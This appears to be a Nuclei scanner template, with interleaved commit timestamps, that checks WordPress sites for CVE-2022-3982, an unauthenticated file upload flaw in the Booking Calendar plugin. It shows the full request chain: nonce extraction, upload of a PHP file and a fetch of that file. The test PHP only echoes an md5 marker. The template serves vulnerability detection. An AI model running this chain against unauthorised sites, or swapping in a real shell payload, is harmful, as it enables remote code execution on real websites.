2023-03-31 11:28:24 +00:00
id : CVE-2022-3982
info :
2023-04-13 15:57:17 +00:00
name : WordPress Booking Calendar <3.2.2 - Arbitrary File Upload
2023-03-31 11:28:24 +00:00
author : theamanrawat
severity : critical
description : |
2023-04-13 15:57:17 +00:00
WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
2023-09-06 11:59:08 +00:00
remediation : Fixed in 3.2.2.
2023-03-31 11:28:24 +00:00
reference :
- https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867
- https://wordpress.org/plugins/booking-calendar/
- https://nvd.nist.gov/vuln/detail/CVE-2022-3982
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-3982
cwe-id : CWE-434
2023-11-10 17:07:52 +00:00
epss-score : 0.17372
2023-11-11 17:44:56 +00:00
epss-percentile : 0.95569
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:*
2023-03-31 11:28:24 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : wpdevart
product : booking_calendar
2023-09-06 11:59:08 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive
2023-03-31 11:28:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-31 11:28:24 +00:00
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=------------------------1cada150a8151a54
--------------------------1cada150a8151a54
Content-Disposition : form-data; name="action"
wpdevart_form_ajax
--------------------------1cada150a8151a54
Content-Disposition : form-data; name="wpdevart_id"
x
--------------------------1cada150a8151a54
Content-Disposition : form-data; name="wpdevart_nonce"
{{nonce}}
--------------------------1cada150a8151a54
Content-Disposition : form-data; name="wpdevart_data"
{"wpdevart-submit" : "X" }
--------------------------1cada150a8151a54
Content-Disposition : form-data; name="wpdevart-submit"
1
--------------------------1cada150a8151a54
Content-Disposition : form-data; name="file"; filename="{{randstr}}.php"
Content-Type : application/octet-stream
<?php echo md5("CVE-2022-3982"); ?>
--------------------------1cada150a8151a54--
- |
GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- contains(header_3, "text/html")
2023-03-31 11:28:24 +00:00
- status_code_3 == 200
- contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')
condition : and
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : nonce
group : 1
regex :
- var wpdevart.*"ajaxNonce":"(.*?)"
internal : true
2023-11-11 17:38:55 +00:00
# digest: 4a0a0047304502202b130dfb7ec75aad2be5105ec6203ad3984692a40149b3bdd4167b1e3f5bd8bc02210092035baa37e483ed3acacbcb4af01efcf07035b5adf5df2f85f45acc09d982a2:922c64590222798bb761d5b6d8e72950